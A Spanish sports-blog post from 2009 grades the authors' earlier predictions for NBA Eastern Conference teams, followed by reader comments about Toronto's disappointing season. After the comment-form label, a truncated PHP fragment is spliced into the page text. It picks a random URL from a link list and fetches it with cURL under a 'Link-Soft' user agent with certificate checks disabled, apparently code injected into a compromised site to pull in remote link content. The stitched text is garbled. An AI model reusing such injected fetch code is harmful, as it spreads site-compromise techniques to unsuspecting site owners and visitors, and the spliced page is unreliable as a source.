Revisando los pronósticos del Este

06 de March de 2009 por Queco

Tras la publicación del repaso a nuestros pronósticos sobre la conferencia Oeste, vamos ahora a repasar los del Este. En este caso muchos de los análisis quedan puntuados a expensas del resultado final, pues la mediocridad reinante en la conferencia, exceptuando bien conocidos casos, hace que casi todos los equipos tengan aún sus opciones de llegar a los Playoffs. Sin embargo, y ciñéndonos a la clasificación actual, hemos intentado puntuarnos justamente. Y es que ya lo decía Niels Bohr: Predecir es muy díficil, especialmente, si se trata del futuro.

DIVISIÓN ATLANTIC

1.- BOSTON: Éste fue nuestro pronóstico – Proyección final: Top 2 del Este.

Ya decía el análisis previo que el campeón presentaba pocas novedades y, por tanto pocos interrogantes. Hablábamos de máxima exigencia pero también de una forma diferente de encarar la regular season, pensando en llegar en el mejor momento posible a la batalla de los Playoffs. Así habría sido, seguramente, pero el magnífico rendimiento de Cavs y Magic no permite muchas licencias y la reciente lesión de Garnett obligará a Rivers a exprimir a Rondo, a Pierce y a un Ray Allen que ha jugado y anotado más de lo que pensábamos en octubre. En global, a estas alturas la previsión es la que comentaba el análisis: Finales de Conferencia contra los Cavs. Otra cosa diferente sería una enorme sorpresa.

Nivel de acierto: B+ (Los Celtics se pueden quedar a un paso de la primera plaza del Este, como Jabho del excelente).

2.- PHILADELPHIA: Éste fue nuestro pronóstico – Proyección final: 6º a 8º del Este.

Visto ahora, qué difícil era acertar mínimamente con la temporada que esperaba a los Sixers. En el análisis previo se planteó la duda de si Elton Brand sería un buen líder, pero nadie imaginaba que su campaña iba a ser tan penosa. La afirmación de que el juego interior Brand-Dalembert “es el mejor de la conferencia” se ha quedado en agua de borrajas.  Andre Miller sí ha sido el base fiable que preveíamos, e Iguodala, aunque ha tardado en arrancar (y ha necesitado que Brand se apartase de su camino) ha acabado ejerciendo de hombre orquesta.

Nivel de acierto: C (aprobado raspado, con la lesión y no adaptación de Brand como eximente)

3.- NEW JERSEY: Éste fue nuestro pronóstico – Proyección final: Luchando el último puesto para playoffs.

La inesperada implicación de Carter en el proyecto, ejerciendo de maestro para los jóvenes, e  igual de inesperadas bajadas de rendimiento en ciertos equipos hacen que NJ esté luchando los playoffs, cosa que dábamos como sorpresa mayúscula. Aun así, el análisis no falla en que este año se usaría para rodar a los jóvenes, Harris, Lopez o Jianlian, y en que el puesto de small forward sería un problema.

Nivel de acierto: C ( Será suspenso si finalmente entran en playoffs, por ahora aprobadito…)

4.- New York: Éste fue nuestro pronóstico – Proyección final: Luchando el último puesto para playoffs.

Nuestro análisis es por completo acertado. D’Antoni llegaba para hacer borrón y cuenta nueva, y es lo que ha hecho. Se ha trasapasado a Randolph, y a Jamal Crawford, e incluso se ha dado la baja a Marbury. El equipo no da para mucho más, y eso es lo que hay, sólo la mala temporada de otros les da posibilidades de playoff.

Nivel de acierto: B- (La lucha por los playoffs resta ahora mismo nota al análisis de Txus, esperaremos)

5.- Toronto: Éste fue nuestro pronóstico – Proyección final: Fuera de playoffs.

Aunque ya anunciábamos un cierto declive, nada hacía prever que fuese tan acuciado. Los Raptors están últimos de división y penúltimos de conferencia, han vendido ya a Jermaine, que no terminó de encajar en el proyecto, y los rumores de la marcha de Bosh son cada vez más insistentes. La única buena noticia es que parece que Bargnani va espabilando.

Nivel de acierto: D (Estar ahora mismo a cinco victorias de los playoffs está lejos de lo pronosticado)

DIVISIÓN CENTRAL

1.- CLEVELAND: Éste fue nuestro pronóstico – Proyección: Top-2 del Este

Nada se puede añadir, Lebron está en plan MVP y los Cavs van primeros del Este, han hecho de Cleveland un fortín donde sólo los Lakers han podido sacar una victoria y no hay nada que haya perturbado la marcha del equipo. Mo Williams ha alcanzado de la mano de Lebron la categoría de All-Star, Wally y Delonte están en un 40% de acierto desde la línea de tres y cada pieza del juego interior hace su trabajo. De aquí a final de temporada no pueden esperar prácticamente ninguna mejora.

Nivel de acierto: A (Al igual que Lebron, Jabho está a nivel MVP)

2.- DETROIT: Éste fue nuestro pronóstico – Proyección: 1ª ronda de Playoffs

Mucho ha cambiado en los Pistons desde el inicio de temporada, pero no ha pasado nada que telekoman no hubiera previsto, Dumars sólo consideraba intransferible a Stuckey y fue Billups el que salió del equipo para dejarle al sophomore más minutos y protagonismo; y no han sido pocos los rumores que daban a Sheed fuera del equipo. La llegada de Iverson supuso la disolución total de lo que quedaba de los Pistons campeones. Su actual sexta plaza es lo mejor a lo que pueden aspirar tras los refuerzos de Miami, y este verano veremos qué hacen con el dinero que liberan.

Nivel de acierto: B+ (Se produjo el cambio en la superficie)

3.- MILWAUKEE: Éste fue nuestro pronóstico – Proyección: Peleando por Playoffs

Ni que se lo hubieran contado a Txusma, los Bucks están haciendo exactamente eso….incluso castigándoles las lesiones. Michael Redd sólo ha podido disputar 33 partidos donde los Bucks consiguieron un balance de 17-16, Bogut hasta ahora ha disputado 36 partidos y no tiene fecha definida para volver. Aun así ahora mismo son octavos y desde la lesión de Redd hemos visto dar un paso al frente a Richard Jefferson, lo que unido al gran rendimiento de Villanueva, el buen hacer de algunos secundarios y lo barata que está la post temporada en el Este los mantiene con opciones.

Nivel de acierto: A (¿Hizo Txus el camino de Denzel Washington?¿Ya había estado antes aquí?)

4.- CHICAGO: Éste fue nuestro pronóstico – Proyección: Peleando por Playoffs

No han conseguido despejar las incógnitas los Bulls, la lesión de Hinrich le puso fácil a Del Negro dar la titularidad a la pareja Rose-Gordon que ha respondido muy bien. El escolta está cuajando una gran temporada y Rose aún algo irregular ha dejado claro que es canela fina. La decepción ha venido esta vez por parte de Luol Deng que no alcanza los 15 puntos por encuentro y ha tenido rachas lamentables de cara al aro. El buen hacer de Tyrus desde hace un mes y las incorporaciones de Salmons y Brad Miller les dejan como favoritos para alcanzar los Playoffs.

Nivel de acierto: B (Ni lucha por la titularidad ni subida del nivel para entrar en Playoffs, así que, están donde él pronosticó sin pasar nada de lo pronosticado)

5.- INDIANA: Éste fue nuestro pronóstico – Proyección: Peleando por Playoffs pero menos

Están a 3.5 victorias de la octava plaza, pero la baja de Dunleavy y los refuerzos de los Bulls dejan casi imposible que Indiana rasque Playoffs, pero no menos imposible parece que hayan ganado a Lakers, Celtics, Cavs y Magics cuando nadie lo hacía. El descomunal nivel de Granger ha sorprendido a todos, incluídos a los que ha metido canastas sobre la bocina. Ésto ha dejado en un segundo plano la temporada de Troy Murphy y las buenas sensaciones de Hibbert. Si TJ Ford se asienta definitivamente yo no me atrevo a descartarles para Playoffs y no cabe duda de que lucharlo lo lucharán. Están en condiciones de igualar la marca del año anterior y Bird no ha cargado a la franquicia con nada de salario, no lo tienen mal para empezar algo serio.

Nivel de acierto: B (Ahí siguen, relativos)

DIVISIÓN SOUTHEAST:

1.-ORLANDO: Éste fue nuestro pronóstico – Proyección Final: Top 4 del Este.

La lesión de Nelson va a poner muy dificil cumplir un pronóstico que no iba nada desencaminado. Los Magic son 3º del Este, pero por momentos han tratado de tu a tu tanto a Cavs como a Celtics y han sido el terror de los equipos del Oeste. Al sólido quinteto incial se les ha unido un banco cumplidor. Incluso por dentro que es donde más problemas tienen, han recuperado a Battie que junto con la aportación defensiva de Gortat dan cierto relevo a Howard. Ahora se abre la incognita de ver cómo se acopla Alston en lugar de Nelson, pero destaca que la franquicia no se cruzó de brazos con la lesión y ficharon a un decente PG que les permite mantener sus aspiraciones en post temporada.

Nivel de acierto: B (Predecir la lesión hubiera sido la repera… mucho tino y la A a tiro)

2.-ATLANTA: Éste fue nuestro pronóstico – Proyección Final: Top 4 del Este.

Las Hawks empezaron el año desmostrando que no fue un espejismo sus serie de Play Offs contra los Celtics el año pasado. Han tenido momentos brillantes, sobre todo cuando las lesiones les respetan. Y aunque en otras fases son mucho más mediocres la suma les da para ser 4º en el Este de manera más o menos holgada. El banco, como habíamos predicho, no aporta demasiado, salvo rachas de Murray y algo de Pachulia, pero el nivel All Star de Joe Johnson junto con un buen hacer de los Horford o Marvin Williams, más la buena noticia de la vuelta de Bibby, les basta por ahora. El margen de mejora es que Josh Smith no acaba de dar el salto que por potencial se le presupone.

Nivel de acierto: D (Tras muchas decepciones nos faltó confianza en ellos… D con pinta de E pero ¿quién acierta siempre? hubo consenso en los comentarios…)

3.-MIAMI: Éste fue nuestro pronóstico – Proyección Final: 1ª Ronda de Play Offs sobrados.

Que los Heat iban a mejorar no era díficil de acertar. Apostar por una gran temporada de Wade, tras dos años de lesiones, no es jugársela, pero, que Pat Riley es una garantía nos da un punto para el pronóstico. Porque los Heat a estas alturas son 5º más o menos sólidos del Este y miran más adelante que atrás. Wade en lo que esperábamos, Haslem los mismo y el bueno de Pat se sacó de la manga de 2ª ronda de draft un más que correcto PG, Chalmers, y ha empaquetado al bueno de Marion por un interior que sano y motivado es de lo mejorcito de la liga. Si algo descuadra en la foto, por ahora, es Beasley, al que también debe favorecer la salida de Marion.

Nivel de acierto: B (Que podría ser supenso al final porque no los decartaría en 2ª ronda…Y Gallis demostrando ser buen conocedor de las artes de Pat)

4.-CHARLOTTE: Éste fue nuestro pronóstico – Proyección Final: Fuera de Play Offs.

Los Bobcats son uno de los equipos que más ha movido su plantilla este año. Se ha desecho de un titular como Richardson y de todo un pick 3 como Morrison. No ha recibido en ninguno de los trades un talento similar al que ha dado, pero sí ha recibido jugadores de corte Brown. Y de hecho, aunque muchas veces falte quien haga un tiro, el equipo ha jugado buenos partidos tras los trades. Por ahora están jugado un año muy irregular, ganado partidos a los grandes a veces y fallando ante equipos que no deberían otras.  DJ Augustine por el momento está devolviendo con buen juego la confianza que depositaron en él. Temporada tirando a floja incluso con las expectativas bajas para ellos. Los Play Offs de momento muy lejos.

Nivel de acierto: C- (Por momentos parace el equipo interesante que Txus pronosticó, pero en general…)

5.-WASHINGTON: Éste fue nuestro pronóstico – Proyección Final: Candidatos a pick 1.

Ya nos lo avanzó Deer, probabilidad 0%. Los Wizards son el peor equipo en el Este y casi de la liga. Además de Arenas se quedaron sin Haywood para todo el año. En estas circunstancias el equipo se deja llevar y sólo algún buen partido de Young o el potencial que a veces asoma en McGee inducen a algo de optimismo. Bueno, y el tener a Butler y Jamison que bien rodeados sería otra cosa. El momento más interesante del año para los capitalinos será la loteria del draft. A ver si ahí tienen la suerte que les viene faltando los últimos dos años.

Nivel de acierto: B (0% de Play Offs pero muchas de pick 1… el que no se consuela… )

Comenta

5 comentarios a esta entrada

  1. Hakeem dice:
    #1

    Aaaa,que esperabais algo de Toronto…xD.Que se puede esperar de un equipo que pone de suplentes de Calde a Salomon y a Ukic(yo no pondria a esos suplentes ni aunque tuviese de base titular a Billups….y les fuese a poner los 10 minutos de descanso de este).Luego no tienen un anotador exterior para que ayude a Bosh(se deberia fichar un tipo Ben Gordon este verano)y hay jugadores como Voskuhl o Jawai que estan ahi por estar.Gracias a dios,Bargnani va a mejor a pesar de su miedo a la zona y a la lucha por el rebote y Marcus Banks es mejor que los anteriores bases suplentes.Por cierto,ni O’Neal ni Marion,para mi no encajan ni han encajado en este equipo…A ver si este verano se pone las pilas Colangelo.

      Citar

  2. Jabho dice:
    #2

    Bienvenido Hakeem.

    Hombre confiarás o no en los Raptors ¿esperabas un año tan malo? Yo no la verdad. Por lo demás el artículo señala las dudas sobre O´neal, sobre el liderazgo de Bosh, sobre la rotación del equipo especialmente en los aleros….

    Tiene curro Colangelo y lo tiene muy dificl porque no creo que Bosh quiera estar allí

      Citar

  3. kantonyo dice:
    #3

    Hakeem, decir eso ahora no tiene merito,

    yo creo que nadie esperaba una temporada tan mala de Toronto. Era practicamente el mismo equipo que habia llegado a playoffs la temporada pasada, con la baja de Delfino y TjFord y con la llegada de Jeramaine, para cubrir el puesto de center. Incluso era la temporada donde Chris Bosh podría haber dado un salto de calidad para estar entre los mejores de la liga, el mismo se autoproclamo candidato a MVP a principio de temporada.

    Ahora todos podemos analizar que ha fallado, o incluso podemos pensar que algo intuiamos……pero posiblemente Toronto Raptors sean la mayor decepcion de la temporada.

      Citar

  4. kantonyo dice:
    #4

    por cierto hakeem, a pesar de lo anterior en tu analisis estoy totalmente de acuerdo en lo que dices respecto a la plantilla de Toronto.

    Un saludo

      Citar

  5. Viva_Dirk dice:
    #5

    Si creo que los Raptors son la mayor decepción de la temporada, para mi también los Clippers pero las lesiones les valen como excusa este año.

    Con respecto a los Raptors tienen una cosa buena, Colangelo puede acertar o equivocarse pero lo intenta siempre. Lo intentó con Jermaine este verano y ahora que ha visto que no funciona lo ha solucionado inmediatamente con un tio que libera un dineral este año. Asi que estoy seguro de que los Raptors seran uno de los protagonistas del verano.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>